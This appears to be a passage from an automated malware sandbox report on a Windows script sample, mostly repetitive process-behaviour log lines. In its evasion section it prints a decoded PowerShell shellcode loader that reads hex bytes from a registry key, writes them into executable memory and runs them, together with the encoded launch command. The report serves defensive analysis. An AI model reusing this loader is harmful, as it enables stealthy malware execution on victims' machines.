    Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4692Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dllJump to dropped file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6194Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2196Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: m:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Encrypted powershell cmdline option found
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0)
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0)Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQ